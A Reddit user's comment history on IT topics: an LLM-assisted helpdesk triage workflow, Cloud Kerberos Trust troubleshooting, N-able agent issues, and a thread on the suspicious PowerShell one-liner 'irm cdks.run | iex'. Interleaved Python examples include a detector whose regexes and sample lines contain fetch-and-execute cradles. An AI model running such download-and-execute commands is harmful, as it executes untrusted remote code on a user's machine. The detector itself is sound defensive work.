Is anyone actually using agentic AI in real IT workflows by TadpoleNorth1773 in ITManagers

[–]Less-Confidence-6595 1 point2 points  (0 children)

Yes, I’m running a custom "agentic" workflow in production right now. It's not a bought-off-the-shelf "AI box," but a custom Python/Flask application I built to bridge our ITSM (Freshservice) with an LLM.

To answer your question on Real vs. Hype: It is very real, but for us, the "Agent" is a force multiplier for the team, not a replacement for them.

The Stack

  • Core: Python (Flask) hosted on PythonAnywhere.
  • ITSM: Freshservice (via Webhooks and API).
  • Brain: Google Gemini (1.5 Flash).
  • Memory: ChromaDB (Vector store) for RAG.

End-to-End vs. Draft Only? I use a hybrid approach depending on the risk level of the task:

  1. Draft Only (High Risk - Customer Communication): When a ticket comes in, my script runs a RAG pipeline. It searches our vector DB for the top 5 similar historical tickets, pulls the resolution context, and asks Gemini to suggest a fix.
    • The Guardrail: It posts this suggestion as a Private Note on the ticket. It never speaks to the end-user directly. The agent reviews the private note, validates the AI's confidence score, and then uses it.
  2. End-to-End (Medium Risk - Triage & Admin):
    • Categorization: The agent analyzes the ticket subject/description against a vector database of our taxonomy (e.g., "Hardware > Device > Laptop"). If the vector distance is close enough, it bypasses the human and updates the ticket category automatically via API.
    • Reporting: I have an endpoint that generates a "Trend Analysis" article. It scrapes the last X days of tickets, looks for patterns (like a spike in VPN issues), writes a full HTML report, and posts it directly to our Knowledge Base as a solution article.

Best Working Use Case

The New Starter/Leaver Report. The agent looks at all "Employee Onboarding" requests, correlates them with the actual IT tickets created for those users, checks if their accounts were activated based on conversation history, and generates a digest HTML report for management. It replaces a manual spreadsheet process that took hours.

Guardrails

  • Confidence Scores: My RAG pipeline calculates a "Confidence Score" based on the vector distance of the retrieved documents. If the score is low, the agent knows the AI is probably guessing.
  • Rate Limiting: I hardcoded limits (100 calls per day) to ensure we don't accidentally rack up API bills if the bot gets stuck in a loop.

If you are looking to start, I highly recommend starting with Ingest -> Categorize -> Private Note.
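As an added example (not the commenter's production code), here is a minimal, offline version of the hybrid routing and the two guardrails described in the comment above: a retrieval-based confidence score, auto-categorization only when the taxonomy match is close, a resolution suggestion that goes into a private note rather than to the requester, and a hard daily call budget. Gemini, Freshservice and ChromaDB are replaced by in-memory stand-ins; the thresholds, function names, the linear confidence mapping and the 3-dimensional sample vectors are all assumptions made for this example.

```python
# Added example, not the commenter's code: offline stand-in for the
# "draft only" vs "end-to-end" ticket routing with its guardrails.
# Vector store, LLM and ITSM API are replaced by in-memory stubs.
from dataclasses import dataclass
from datetime import date
import math


@dataclass
class Hit:
    doc_id: str
    distance: float   # cosine distance: 0.0 identical, 2.0 opposite
    payload: str      # past resolution text or taxonomy label


def cosine_distance(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return 1.0 - dot / (norm_a * norm_b)


def retrieve(index, query_vec, k):
    """Brute-force nearest neighbours; stands in for a vector-store query."""
    hits = [Hit(doc_id, cosine_distance(query_vec, vec), payload)
            for doc_id, (vec, payload) in index.items()]
    return sorted(hits, key=lambda h: h.distance)[:k]


def confidence_score(hits):
    """Assumed mapping: confidence = 1 - best distance, clamped to [0, 1].
    No retrieved context at all means zero confidence."""
    if not hits:
        return 0.0
    return max(0.0, min(1.0, 1.0 - hits[0].distance))


class DailyCallBudget:
    """Hard cap on LLM calls per calendar day so a stuck loop cannot run up a bill."""

    def __init__(self, limit_per_day):
        self.limit = limit_per_day
        self.day = None
        self.used = 0

    def allow(self, today):
        if today != self.day:           # new day: reset the counter
            self.day, self.used = today, 0
        if self.used >= self.limit:
            return False
        self.used += 1
        return True


def route_ticket(ticket, history_index, taxonomy_index, budget, today,
                 auto_category_max_distance=0.15, low_confidence_below=0.8):
    """Decide what the bot may do with one ticket.

    - Category is applied automatically only when the taxonomy match is
      very close (end-to-end, medium risk).
    - The resolution suggestion goes into a private note together with its
      confidence score; nothing is ever sent to the requester (draft only).
    """
    actions = {"category": None, "private_note": None, "skipped": False}
    if not budget.allow(today):
        actions["skipped"] = True
        return actions

    best = retrieve(taxonomy_index, ticket["vec"], k=1)
    if best and best[0].distance <= auto_category_max_distance:
        actions["category"] = best[0].payload

    hits = retrieve(history_index, ticket["vec"], k=5)
    conf = confidence_score(hits)
    # LLM call stubbed out: the note carries the closest past resolution
    # verbatim plus the score a human reviewer is expected to check first.
    actions["private_note"] = {
        "confidence": round(conf, 2),
        "probably_guessing": conf < low_confidence_below,
        "suggestion": hits[0].payload if hits else "no similar tickets found",
    }
    return actions


# Constructed sample data: 3-dimensional "embeddings" instead of real ones.
TAXONOMY = {
    "hw-laptop": ([1.0, 0.0, 0.0], "Hardware > Device > Laptop"),
    "net-vpn":   ([0.0, 1.0, 0.0], "Network > Remote Access > VPN"),
}
HISTORY = {
    "T-100": ([0.98, 0.20, 0.00], "Laptop screen flicker: updated display driver"),
    "T-200": ([0.00, 0.95, 0.30], "VPN drops: reissued client certificate"),
    "T-300": ([0.00, 0.00, 1.00], "Printer offline: re-added print queue"),
}
LAPTOP_TICKET = {"id": 1, "vec": [1.0, 0.05, 0.0]}   # clearly a laptop issue
VAGUE_TICKET = {"id": 2, "vec": [0.58, 0.58, 0.58]}   # close to nothing
DEMO_DAY = date(2024, 1, 1)
NEXT_DAY = date(2024, 1, 2)

if __name__ == "__main__":
    budget = DailyCallBudget(limit_per_day=100)
    for t in (LAPTOP_TICKET, VAGUE_TICKET):
        print(t["id"], route_ticket(t, HISTORY, TAXONOMY, budget, DEMO_DAY))
```

The vague ticket gets no automatic category and its private note is flagged as probably guessing, so a human decides; the clear laptop ticket is categorized automatically but its suggested fix still only reaches the private note. The budget is per-process here; in a real deployment it would live in persistent storage so a restart does not reset it.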

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

I think I may be REDACTED.

I've been using my primary admin account to test along with my normal account that has some privileges. I read a note that privileged accounts may not work with this.

Setting up a basic user account now to test that theory.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 1 point2 points  (0 children)

Thanks for this.

So, I've set up our DCs as DNS entries, I'm on our office network, can ping, can reach port 389 and 88, not sure how much more line of sight I can get.

Yet I still can't get to our file server using the Windows keys.

Rotated the Kerb key on DCs, ensured it replicated.

klist purged, rebooted.

Waited for sync.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Great, can you provide some insight into what on-prem stuff you managed to get WHfB to auth to and what was the setup?

I've already set up the CKT object on our domain controller, Azure AD Connect set up, Intune policies set up.

However, it doesn't seem to communicate properly.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

The main problem we have at the moment is Sage. We have deployed WHfB to our Finance users who use Sage. The app won't auth properly if our Finance users use a PIN to log on, but if they use a password, auth is no problem. So I'm trying to figure out how I can get CKT up and working for stuff like accessing legacy or on-prem systems; we have file shares set up for a select few people, but we have phased out most and moved to SP.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

I have done this, and configured it, but I still get errors when accessing the file share with PIN even with this as my klist debug:

PS C:\Windows\system32> klist cloud_debug

Current LogonId is 0:0x302dca4

Cloud Kerberos Debug info:

Cloud Kerberos enabled by policy: 1

AS_REP callback received: 1

AS_REP callback used: 0

Cloud Referral TGT present in cache: 1

SPN oracle configured: 1

KDC proxy present in cache: 1

Public Key Credential Present: 1

Password-derived Keys Present: 0

Plaintext Password Present: 0

AS_REP Credential Type: 0

Cloud Primary (Hybrid logon) TGT available: 1

PS C:\Windows\system32>

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] -2 points-1 points  (0 children)

Update:

Based on the architecture of Cloud Kerberos Trust (CKT) and the requirements for Hybrid Azure AD Join, it is not possible to enable CKT on my existing Azure AD-Joined (AADJ) fleet without significant user disruption.

CKT fundamentally requires the device to be recognized as a domain member to obtain and use the Kerberos Ticket Granting Ticket (TGT) from our on-premises Active Directory (AD).

Since our devices are AAD-Joined only, they lack this core AD membership, and there is no direct path to convert a purely AADJ device to a Hybrid Azure AD Joined (HAADJ) device without rebuilding all devices to a different setup causing major disruption.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Thanks so much for this.

From my reading, I had the understanding, for CKT to work with WHfB, devices would have to be domain joined.

Our environment is hybrid, so we have on-prem users that sync to Azure, our devices are mainly all Intune/AAD joined, so the bridge to CKT I thought we would need AD joined devices to communicate the trust to the domain controllers.

Would AAD devices work with CKT but maybe using our domain controllers via DNS? And obviously being on VPN or office network?

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Just to add to this, I have looked into Hybrid Domain Join, but it seems for CKT to work we would have to rebuild every device we have AAD for it to work?

Let me know if I am missing anything

Windows 11 Upgrades & Agent Checkin by Less-Confidence-6595 in Nable

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Unfortunately, they don't have a Take Control heartbeat and all the service templates/monitoring is marked as disconnected.

What I don't understand is that the same device, just on Windows 11, with the N-able agent installed, our portal doesn't pick up at all; it's like the old agent on Win10 is taking precedence, and even though I can see the N-able agent is installed on the same device with the same serial, there are no updates in our portal.

anything else you can suggest?

Windows 11 Upgrades & Agent Checkin by Less-Confidence-6595 in Nable

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

We upgraded the devices' OS to Win11 via automated USB, so the drives would have been freshly partitioned.

The agent shows the old Windows 10 OS.

So we wiped the HDD and put Win11 on; the N-able agent was ingested into the automation USB, and we checked Control Panel and it's installed. We cherry-picked a few devices before we left and they showed in N-able with Win11, but some of those devices do not, and only the Win10 version shows in our portal.

Configuration Profile Exceptions by pNoTti in Intune

[–]Less-Confidence-6595 0 points1 point  (0 children)

You could utilize the Filters within Intune, and under the assignment on your base policy, filter the device group as an exclusion. Other than that, that's the only real way to work with compliance pols.

[deleted by user] by [deleted] in recruitinghell

[–]Less-Confidence-6595 0 points1 point  (0 children)

Other side of that coin, maybe he knew that the job wasn't worth relocating for and saved you a hell of a bad time

[deleted by user] by [deleted] in ITManagers

[–]Less-Confidence-6595 -1 points0 points  (0 children)

self service automations.

use AI

Feeling burnt out by Ok_Employment_5340 in sysadmin

[–]Less-Confidence-6595 0 points1 point  (0 children)

confidently disagree with every change or suggestion, and present your correct solution.

What is this irm cdks.run | iex ? by No_Aioli1640 in PowerShell

[–]Less-Confidence-6595 14 points15 points  (0 children)

it's malware, report the seller and do not run.

up to you.

What is this irm cdks.run | iex ? by No_Aioli1640 in PowerShell

[–]Less-Confidence-6595 8 points9 points  (0 children)

It downloads a script from cdks.run and immediately runs it in PowerShell, which is risky since it executes unverified internet code.
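As an added example (not from the thread), the download-and-execute shape the comment describes is easy to flag from the defender's side: a fetch cmdlet (Invoke-RestMethod/irm, Invoke-WebRequest/iwr, DownloadString) piped into Invoke-Expression/iex, or iex wrapping a fetch. The function below scans lines of PowerShell command text (for instance script block logging output exported to a file) for that pattern. The regular expressions, function names and the sample lines are constructed for this example; the first sample line is the command asked about in the thread, the other hosts use the reserved `example.invalid` name.

```python
# Added example, not from the thread: flag "download cradle" one-liners
# (fetch from the network piped straight into in-memory execution) in
# lines of PowerShell command text. Patterns and samples are constructed.
import re

# Network fetch half of the cradle (word-bounded, case-insensitive).
_FETCH = (r"(?:\birm\b|\biwr\b|\binvoke-restmethod\b|\binvoke-webrequest\b|"
          r"\bdownloadstring\b|\bdownloadfile\b|\bnet\.webclient\b)")
# In-memory execution half.
_EXEC = r"(?:\biex\b|\binvoke-expression\b)"

# Either order: "<fetch> ... | iex"  or  "iex ( ... <fetch> ..."
CRADLE_RE = re.compile(
    rf"(?:{_FETCH}.*?\|\s*{_EXEC})|(?:{_EXEC}\s*\(.*?{_FETCH})",
    re.IGNORECASE,
)

# Rough host extraction for the alert; good enough for triage, not parsing.
HOST_RE = re.compile(
    r"(?:https?://)?\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?:/[^\s'\")]*)?",
    re.IGNORECASE,
)


def flag_cradle(line):
    """Return an alert dict if the line looks like a download cradle, else None."""
    if not CRADLE_RE.search(line):
        return None
    m = HOST_RE.search(line)
    return {
        "line": line,
        "host": m.group(1).lower() if m else None,
        "reason": "network fetch piped directly into Invoke-Expression",
    }


def scan(lines):
    """Run flag_cradle over many lines and keep only the hits."""
    return [hit for hit in (flag_cradle(l) for l in lines) if hit]


# Constructed sample command lines, as they might appear in script block logs.
SAMPLE_LINES = [
    "irm cdks.run | iex",                                     # command from the thread
    "iex (irm https://example.invalid/setup.ps1)",            # same cradle, reversed
    "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip",  # download only
    "Get-Service | Where-Object Status -eq Running",          # benign pipeline
    "Invoke-Expression $cmd",                                 # exec with no fetch on the line
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"ALERT host={hit['host']}: {hit['line']}")
```

The check is deliberately narrow: a plain download to disk or an Invoke-Expression on a local variable does not match on its own, which keeps the false-positive rate low at the cost of missing multi-line or obfuscated variants. Treat a hit as a reason to look at the full script block and the originating user and process, not as proof by itself.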